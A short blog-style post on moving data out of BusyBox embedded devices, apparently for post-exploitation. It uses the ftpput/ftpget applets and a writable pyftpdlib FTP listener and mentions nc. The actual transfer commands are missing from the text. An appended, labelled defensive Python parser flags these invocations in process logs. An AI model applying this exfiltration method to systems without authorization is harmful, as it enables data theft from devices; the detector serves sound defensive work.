This is a super quick post on a simple method to exfiltrate data from systems running BusyBox, a shell commonly used on embedded devices. Such systems often lack common tools, presenting a challenge when you need to move data about. When I first looked into this topic I found solutions which were too specific or complex, so I hope this post is useful.
The BusyBox man page lists commonly available commands, which currently include *deep breath*:
Spot anything interesting? The commands ftpput and ftpget should stand out, and they do exactly what you'd expect. Note that there may not be a symlink to the commands on a given system even if they're compiled into BusyBox - if running ftpput returns "not found" try busybox ftpput to access the command (the applet in BusyBox parlance).
Listening for files
All you need now is a listening FTP server. Any will do, but I found pyftpdlib - an "extremely fast Python FTP server" - perfect for this purpose. To get it working, install the library on your server (most distros have a package) then fire it up in the directory where you want to send or receive files like this:
python3 -m pyftpdlib -w
By default the server listens on port 2121, which can be changed with the -p flag. The -w flag tells the module to allow files to be written. Presto, a working anonymous FTP server! For more options, run the module with the -h option.
To send files from the BusyBox instance to your server, you can now run:
Similarly, you can get files from your server by running:
Note: As pointed out over on Hacker News, the nc command is also a nice option; however, not all commands are always compiled in and I've found ftpput and ftpget more commonly available, perhaps due to the ubiquity of FTP.
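For defenders reviewing process-execution logs from such devices, the sketch below (an added example, not part of the original post) flags ftpput/ftpget invocations, whether run through a symlink or as busybox ftpput, and pulls out the destination host and port. The function names and sample command lines are constructed for illustration; option handling assumes the applets' short options -u, -p and -P each take a value.

```python
import os
import shlex

APPLETS = {"ftpput", "ftpget"}
VALUE_OPTS = {"-u", "-p", "-P"}  # short options that consume the next argument

def parse_ftp_applet(cmdline):
    """Return a finding dict if cmdline runs ftpput/ftpget, else None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:               # unbalanced quotes in a logged line
        argv = cmdline.split()
    if not argv:
        return None
    name = os.path.basename(argv[0])  # handles /bin/ftpput, /usr/bin/busybox, ...
    if name == "busybox" and len(argv) > 1 and argv[1] in APPLETS:
        applet, args, multicall = argv[1], argv[2:], True   # "busybox ftpput ..."
    elif name in APPLETS:
        applet, args, multicall = name, argv[1:], False     # symlinked applet
    else:
        return None
    port, positional = 21, []         # 21 is the FTP default when -P is absent
    it = iter(args)
    for tok in it:
        if tok in VALUE_OPTS:
            val = next(it, None)      # skip the option's value
            if tok == "-P" and val and val.isdigit():
                port = int(val)
        elif tok.startswith("-P") and tok[2:].isdigit():
            port = int(tok[2:])       # attached form, e.g. -P2121
        elif not tok.startswith("-"):
            positional.append(tok)
    return {
        "applet": applet,
        "direction": "upload" if applet == "ftpput" else "download",
        "host": positional[0] if positional else None,
        "port": port,
        "via_busybox": multicall,
    }

def scan(lines):
    """Run the parser over many logged command lines, keeping only hits."""
    return [f for f in map(parse_ftp_applet, lines) if f]

# Constructed sample command lines (documentation-range address, made-up paths).
SAMPLE = [
    "ls -la /etc",
    "ftpput -P 2121 192.0.2.10 config.bak /etc/config",
    "/bin/busybox ftpget -P2121 192.0.2.10 /tmp/update.bin update.bin",
    "busybox ls /tmp",
]
```

Calling scan(SAMPLE) returns two findings; an outbound upload to a non-standard port such as pyftpdlib's default 2121 is the one most worth alerting on.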